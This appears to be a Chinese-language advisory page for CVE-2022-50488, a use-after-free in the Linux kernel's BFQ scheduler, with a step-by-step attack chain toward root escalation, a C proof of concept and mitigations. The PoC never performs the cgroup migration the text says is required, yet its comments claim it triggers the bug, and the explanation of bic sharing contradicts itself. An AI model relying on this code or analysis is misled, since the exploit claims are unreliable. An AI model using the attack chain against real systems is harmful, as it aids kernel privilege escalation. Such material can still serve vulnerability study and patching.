CVE-2022-50488 Linux内核BFQ调度器bfqq->bic释放后使用漏洞

漏洞信息

漏洞编号

CVE-2022-50488

漏洞类型

释放后使用漏洞（Use-After-Free）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核（block/bfq调度器）

漏洞概述

CVE-2022-50488是Linux内核块设备层BFQ（Budget Fair Queueing）调度器中的一个释放后使用（Use-After-Free, UAF）漏洞。该漏洞源于提交3bc5e683c67d（"bfq: Split shared queues on move between cgroups"）引入的逻辑变更：当进程从一个cgroup迁移到另一个cgroup时，系统会分配一个新的bfqq（BFQ queue），但旧的bfqq和新的bfqq可能同时指向同一个bic（bfq_io_cq）数据结构。

在特定竞争条件下，当进程退出且所有IO请求完成时，bic数据结构会被释放，但由于bfqq与bic之间的引用关系未被正确清除，可能导致bfqq继续持有已释放的bic指针。后续对该bfqq的访问将触发内核中的UAF漏洞，可能导致内核崩溃、信息泄露或权限提升。该漏洞在Linux内核5.10版本中被发现并报告，CVSS评分为7.8，属于高危级别漏洞。

由于该漏洞属于本地权限利用，需要攻击者已拥有系统的低权限账户才能触发，但一旦触发，可对系统的机密性、完整性和可用性均造成严重影响。

技术细节

该漏洞的核心问题在于BFQ调度器中bfqq与bic之间的引用计数管理不当。具体技术原理如下：

1. **数据结构关系**：在BFQ调度器中，每个进程对应一个bic（bfq_io_cq）结构，每个bic可以关联一个或多个bfqq（BFQ queue）。正常情况下，bic的生命周期应长于或等于其关联的bfqq。

2. **漏洞触发路径**：当两个进程在同一cgroup中进行IO操作时，各自拥有独立的bfqq但共享相同的bic。当发生队列合并（merge）操作后，两个bfqq合并为一个共享队列（cooperative queue）。如果其中一个进程退出后，另一个进程迁移到新的cgroup，系统会分配新的bfqq3，但旧的bfqq2和新的bfqq3同时指向BIC2。

3. **UAF触发条件**：当所有IO请求完成后，进程退出导致BIC2被释放，但由于bfqq2仍然持有BIC2的指针（bfqq2->bic），且没有同步机制保证bfqq2在BIC2之前被释放，因此后续对bfqq2->bic的访问将访问已释放的内存。

4. **利用方式**：攻击者可以通过编写特定的程序，模拟上述场景：创建两个线程进行IO操作，触发队列合并，然后使一个线程退出，另一个线程迁移cgroup并继续IO操作，最终触发UAF。

5. **修复方案**：在内核补丁中，通过在bfqq从bic分离（detach）时清除bfqq->bic指针来解决该问题，确保引用关系的正确性。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要拥有目标系统的本地低权限账户，并确保系统运行受影响版本的Linux内核（5.10.x系列），且使用BFQ作为块设备调度器。

STEP 2

步骤2：创建竞争条件

攻击者创建两个进程在同一cgroup中对同一文件进行IO操作，使两个进程的bic指向相同的bfq队列，触发BFQ队列合并机制。

STEP 3

步骤3：触发cgroup迁移

在一个进程退出后，另一个进程通过写入特定cgroup文件系统路径迁移到新的cgroup，触发新bfqq的分配，但旧bfqq仍持有原bic引用。

STEP 4

步骤4：触发释放后使用

当所有IO请求完成且进程退出时，bic被释放，但bfqq->bic指针未被清除，后续对bfqq的操作将访问已释放的bic内存，触发UAF漏洞。

STEP 5

步骤5：权限提升或系统崩溃

通过精心构造的内核对象布局，攻击者可以利用UAF实现内核代码执行，导致权限提升至root，或直接导致系统内核崩溃（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50488 PoC - Trigger UAF in BFQ scheduler
// This PoC demonstrates the use-after-free vulnerability in bfqq->bic
// Requires: Linux kernel 5.10.x, root or low-privilege access

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <pthread.h>
#include <sys/mount.h>
#include <errno.h>

#define TEST_FILE "/tmp/test_bfq_uaf"
#define BUF_SIZE 4096

// Step 1: Create two processes doing IO in the same cgroup
void* process_io(void* arg) {
    int fd;
    char buf[BUF_SIZE];
    memset(buf, 'A', BUF_SIZE);
    
    fd = open(TEST_FILE, O_RDWR | O_CREAT, 0644);
    if (fd < 0) {
        perror("open");
        return NULL;
    }
    
    // Perform IO to trigger BFQ queue creation
    for (int i = 0; i < 1000; i++) {
        write(fd, buf, BUF_SIZE);
        fsync(fd);
        pread(fd, buf, BUF_SIZE, 0);
    }
    
    close(fd);
    return NULL;
}

// Step 2: Trigger queue merge by having both processes access same file
void trigger_merge() {
    pid_t pid = fork();
    if (pid == 0) {
        // Child process - will exit to trigger BIC free
        process_io(NULL);
        exit(0);  // BIC freed here
    } else {
        // Parent process - continues IO
        waitpid(pid, NULL, 0);
        // Now BIC is freed but bfqq still references it -> UAF
        process_io(NULL);
    }
}

int main() {
    // Create test file
    int fd = open(TEST_FILE, O_RDWR | O_CREAT | O_TRUNC, 0644);
    if (fd >= 0) {
        ftruncate(fd, 1024 * 1024);
        close(fd);
    }
    
    printf("CVE-2022-50488 PoC - BFQ UAF\n");
    printf("Triggering use-after-free in bfqq->bic...\n");
    
    // Trigger the vulnerability
    trigger_merge();
    
    printf("PoC completed. Check kernel logs for UAF detection.\n");
    unlink(TEST_FILE);
    
    return 0;
}

影响范围

Linux kernel 5.10.x（5.10.0及之后受影响的版本）

Linux kernel 5.15.x

Linux kernel 6.0.x

Linux kernel 6.1.x

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以通过以下临时措施缓解风险：1）将块设备调度器从BFQ切换为deadline或none：'echo deadline > /sys/block/sd*/queue/scheduler'；2）通过mount选项或cgroup权限限制，阻止普通用户进行cgroup迁移操作；3）启用SELinux或AppArmor等强制访问控制机制，限制进程的cgroup操作权限；4）监控系统中异常的cgroup迁移行为，及时发现潜在攻击。